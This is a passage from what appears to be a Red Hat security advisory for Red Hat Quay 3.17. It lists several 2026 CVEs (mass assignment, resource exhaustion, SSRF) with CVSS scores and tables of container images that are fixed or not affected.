Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-42035

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix Workaround

Known not affected 27 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-42039

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-42041

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64		—

Threats

Impact Important

CVE-2026-42043

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64	—	Vendor Fix fix

Known not affected 27 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64		—
Unresolved product id: Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64		—
